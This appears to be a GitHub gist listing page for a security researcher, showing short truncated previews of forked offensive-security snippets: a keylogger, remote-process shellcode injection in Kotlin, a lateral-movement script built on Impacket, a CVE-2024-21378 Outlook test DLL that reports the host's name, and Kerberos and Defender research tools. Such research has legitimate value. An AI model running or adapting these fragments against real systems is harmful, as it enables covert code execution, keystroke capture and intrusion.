mgeeky
/ keylogger.cpp
Created
January 16, 2025 17:38
— forked from x86matthew/keylogger.cpp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <windows.h> | |
| #pragma comment(lib, "winmm.lib") | |
| void Nothing(WORD wKey) | |
| { | |
| } | |
| void PrintKey(WORD wKey) |
mgeeky
/ DynamicLibrary.cpp
Created
December 18, 2024 11:17
— forked from Washi1337/DynamicLibrary.cpp
Injecting unconventional entry points in a .NET module. Blog post: https://washi.dev/blog/posts/entry-points/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <cstdio> | |
| #include <windows.h> | |
| VOID WINAPI TlsCallback(PVOID DllHandle, DWORD Reason, PVOID Reserved) | |
| { | |
| puts("[DynamicLibrary.dll]: TLS Callback"); | |
| } | |
| #ifdef _WIN64 | |
| #pragma comment (linker, "/INCLUDE:_tls_used") |
mgeeky
/ Get-KerberosAESKey.ps1
Created
December 10, 2024 20:25
— forked from Kevin-Robertson/Get-KerberosAESKey.ps1
Generate Kerberos AES keys from a known password
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosAESKey | |
| { | |
| <# | |
| .SYNOPSIS | |
| Generate Kerberos AES 128/256 keys from a known username/hostname, password, and kerberos realm. The | |
| results have been verified against the test values in RFC3962, MS-KILE, and my own test lab. | |
| https://tools.ietf.org/html/rfc3962 | |
| https://msdn.microsoft.com/library/cc233855.aspx |
mgeeky
/ Spamassassin rules description
Created
December 5, 2024 19:37
— forked from ychaouche/Spamassassin rules description
Spamassassin rules description
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1 AC_BR_BONANZA Too many newlines in a row... spammy template | |
| 2 ACCESSDB Message would have been caught by accessdb | |
| 3 ACCT_PHISHING_MANY Phishing for account information | |
| 4 AC_DIV_BONANZA Too many divs in a row... spammy template | |
| 5 AC_FROM_MANY_DOTS Multiple periods in From user name | |
| 6 AC_HTML_NONSENSE_TAGS Many consecutive multi-letter HTML tags, likely nonsense/spam | |
| 7 AC_POST_EXTRAS Suspicious URL | |
| 8 AC_SPAMMY_URI_PATTERNS10 link combos match highly spammy template | |
| 9 AC_SPAMMY_URI_PATTERNS11 link combos match highly spammy template | |
| 10 AC_SPAMMY_URI_PATTERNS12 link combos match highly spammy template |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| int main() { | |
| HANDLE file = CreateFileA(".\\test.txt", GENERIC_WRITE, FILE_SHARE_WRITE, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ENCRYPTED|FILE_FLAG_DELETE_ON_CLOSE, NULL); | |
| if (!file || file == INVALID_HANDLE_VALUE) { | |
| return GetLastError(); | |
| } | |
| CloseHandle(file); | |
| return 0; | |
| } |
mgeeky
/ EtwStartWebClient.cs
Created
December 5, 2024 14:13
— forked from klezVirus/EtwStartWebClient.cs
A PoC in C# to enable WebClient Programmatically
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Runtime.InteropServices; | |
| using System; | |
| /* | |
| * Simple C# PoC to enable WebClient Service Programmatically | |
| * Based on the C++ version from @tirannido (James Forshaw) | |
| * Twitter: https://twitter.com/tiraniddo | |
| * URL: https://www.tiraniddo.dev/2015/03/starting-webclient-service.html | |
| * | |
| * Compile with: |
mgeeky
/ Kotlin Shellcode Injection.kt
Created
December 4, 2024 14:50
— forked from Jire/Kotlin Shellcode Injection.kt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| fun injectShellcode(vararg shellcode: Int) { | |
| val length = shellcode.size | |
| val hProcess = (lms!! as WindowsProcess).handle | |
| val internalBlock = Kernel32.VirtualAllocEx(hProcess, 0, shellcode.size, | |
| WinNT.MEM_COMMIT, WinNT.PAGE_EXECUTE_READWRITE) | |
| val buffer = Memory(shellcode.size.toLong()) | |
| for (i in 0..shellcode.lastIndex) buffer.setByte(i.toLong(), shellcode[i].toByte()) | |
mgeeky
/ atexec_rpc.py
Created
November 29, 2024 23:47
— forked from ThePirateWhoSmellsOfSunflowers/atexec_rpc.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # Impacket - Collection of Python classes for working with network protocols. | |
| # | |
| # Copyright Fortra, LLC and its affiliated companies | |
| # | |
| # All rights reserved. | |
| # | |
| # This software is provided under a slightly modified version | |
| # of the Apache Software License. See the accompanying LICENSE file | |
| # for more information. |
mgeeky
/ test_dll.c
Created
November 26, 2024 16:23
— forked from Homer28/test_dll.c
DLL code for testing CVE-2024-21378 in MS Outlook
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * This DLL is designed for use in conjunction with the Ruler tool for | |
| * security testing related to the CVE-2024-21378 vulnerability, | |
| * specifically targeting MS Outlook. | |
| * | |
| * It can be used with the following command line syntax: | |
| * ruler [auth-params] form add-com [attack-params] --dll ./test.dll | |
| * Ruler repository: https://github.com/NetSPI/ruler/tree/com-forms (com-forms branch). | |
| * | |
| * After being loaded into MS Outlook, it sends the PC's hostname and |
mgeeky
/ ExpandDefenderSig.ps1
Created
November 21, 2024 23:37
— forked from dezhub/ExpandDefenderSig.ps1
Decompresses Windows Defender AV signatures for exploration purposes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| filter Expand-DefenderAVSignatureDB { | |
| <# | |
| .SYNOPSIS | |
| Decompresses a Windows Defender AV signature database (.VDM file). | |
| .DESCRIPTION | |
| Expand-DefenderAVSignatureDB extracts a Windows Defender AV signature database (.VDM file). This function was developed by reversing mpengine.dll and with the help of Tavis Ormandy and his LoadLibrary project (https://github.com/taviso/loadlibrary). Note: Currently, "scrambled" databases are not supported although, I have yet to encounter a scrambled database. Thus far, all databases I've encountered are zlib-compressed. |
NewerOlder